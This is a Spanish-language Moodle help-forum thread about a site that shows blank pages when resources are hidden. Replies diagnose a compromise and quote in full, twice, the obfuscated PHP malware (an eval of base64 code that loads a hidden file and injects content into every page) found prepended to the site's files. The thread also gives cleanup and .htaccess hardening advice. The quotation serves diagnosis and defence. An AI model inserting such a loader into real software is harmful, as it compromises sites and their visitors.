Tengo una plataforma con 1.9.3 que ha venido funcionando sin problemas. De pronto, cuando quiero ocultar una actividad o recurso y le doy en el "ojito", va a una página en blanco y no hace nada.
¿Alguien tiene una idea de qué puede haber pasado y de cómo arreglarlo?
Pongo lo que aparece en la URL en uno de los muchos ejemplos. Supongo que tiene que ver con el comando "sesskey", pero que yo sepa nadie ha tocado nada. Afecta a todo el sitio.
http://www.didacticaambiental.com/alumnado/course/mod.php?hide=520&sesskey=AMGylVkfJa&sr=3
Hola Fernando 
Aparte de no poder ocultar los recursos, ¿has probado a editarlos? Estos es, comprobar si te permite moverlos, renombrarlos...
Comprueba lo que se comenta en este hilo:
http://moodle.org/mod/forum/discuss.php?d=112205#p492322
En otras ocasiones el problema puede estar motivado por la instalación de un módulo no estándar. No estaría de más que activases el modo depuración (Administración > Servidor > Depurando) para ver si te aparece algún mensaje de aviso.
Salu2
W
Aparte de no poder ocultar los recursos, ¿has probado a editarlos? Estos es, comprobar si te permite moverlos, renombrarlos...
Comprueba lo que se comenta en este hilo:
http://moodle.org/mod/forum/discuss.php?d=112205#p492322
En otras ocasiones el problema puede estar motivado por la instalación de un módulo no estándar. No estaría de más que activases el modo depuración (Administración > Servidor > Depurando) para ver si te aparece algún mensaje de aviso.
Salu2
W
Hola Fernando.
Pues siento decirte que todo indica que se has sido víctima de algún tipo de ataque. Sólo tienes que comprobar los archivos php de moodle y verás como varios (probablemente la mayoría) están modificados, añadiendo al inicio del fichero algo parecido a esto:
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvTGlicmFyeS9XZWJTZXJ2ZXIvRG9jdW1lbnRzL21vb2RsZWRhdGEvMS9iYWNrdXBkYXRhL2Jvb2svbGFuZy9jcy9oZWxwL2Jvb2svbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvTGlicmFyeS9XZWJTZXJ2ZXIvRG9jdW1lbnRzL21vb2RsZWRhdGEvMS9iYWNrdXBkYXRhL2Jvb2svbGFuZy9jcy9oZWxwL2Jvb2svbWRsX3V0Zi5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
A nosotros también nos ha pasado recientemente y hay varios post abiertos tanto en los foros de español como en los de inglés:
http://moodle.org/mod/forum/discuss.php?d=112205
http://moodle.org/mod/forum/discuss.php?d=111886
http://moodle.org/mod/forum/discuss.php?d=111710
Nosotros todavía estamos intentando averiguar por donde nos han entrado (parece que es por otro software que tenemos), y no he visto todavía a nadie que de una respuesta clara de cómo puede pasar esto.
La solución más simple es buscar el foco de la infección, erradicarlo, y sustituir los ficheros de moodle por una instalación limpia.
Ya me contarás que ta te va.
Un saludo.
Pues siento decirte que todo indica que se has sido víctima de algún tipo de ataque. Sólo tienes que comprobar los archivos php de moodle y verás como varios (probablemente la mayoría) están modificados, añadiendo al inicio del fichero algo parecido a esto:
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvTGlicmFyeS9XZWJTZXJ2ZXIvRG9jdW1lbnRzL21vb2RsZWRhdGEvMS9iYWNrdXBkYXRhL2Jvb2svbGFuZy9jcy9oZWxwL2Jvb2svbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvTGlicmFyeS9XZWJTZXJ2ZXIvRG9jdW1lbnRzL21vb2RsZWRhdGEvMS9iYWNrdXBkYXRhL2Jvb2svbGFuZy9jcy9oZWxwL2Jvb2svbWRsX3V0Zi5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
A nosotros también nos ha pasado recientemente y hay varios post abiertos tanto en los foros de español como en los de inglés:
http://moodle.org/mod/forum/discuss.php?d=112205
http://moodle.org/mod/forum/discuss.php?d=111886
http://moodle.org/mod/forum/discuss.php?d=111710
Nosotros todavía estamos intentando averiguar por donde nos han entrado (parece que es por otro software que tenemos), y no he visto todavía a nadie que de una respuesta clara de cómo puede pasar esto.
La solución más simple es buscar el foco de la infección, erradicarlo, y sustituir los ficheros de moodle por una instalación limpia.
Ya me contarás que ta te va.
Un saludo.
En respuesta a Fernando F. Rojero
Re: no cambia de visible a invisible
Estimado Fernando:
Algunos link al respecto:
- http://moodle.org/mod/forum/discuss.php?d=115990#p509202
- http://moodle.org/mod/forum/discuss.php?d=116038#p509198
- http://moodle.org/mod/forum/discuss.php?d=116174#p509770
Espero que sea de tu ayuda,
Saludo
Ricardo
Algunos link al respecto:
- http://moodle.org/mod/forum/discuss.php?d=115990#p509202
- http://moodle.org/mod/forum/discuss.php?d=116038#p509198
- http://moodle.org/mod/forum/discuss.php?d=116174#p509770
Espero que sea de tu ayuda,
Saludo
Ricardo
Hola a todos, me acaba de suceder lo mismo en Moodle 1.8.2.. ya borré los códigos de más de 100 phps..
Mis preguntas son:
- Con un upgrade se arreglará el asunto?? Por ejemplo instalar la 1.9.4?? y que se reemplacen los de la versión anterior??
- ¿Qué hacer en caso de éste ataque? solo con poner el
.htaccess
php_flag register_globals off
php_flag allow_url_fopen off
php_flag magic_quotes_gpc on
Asegurarémos un poco más nuestro moodle de inyección de código malicioso.
Saludos y muchas gracias.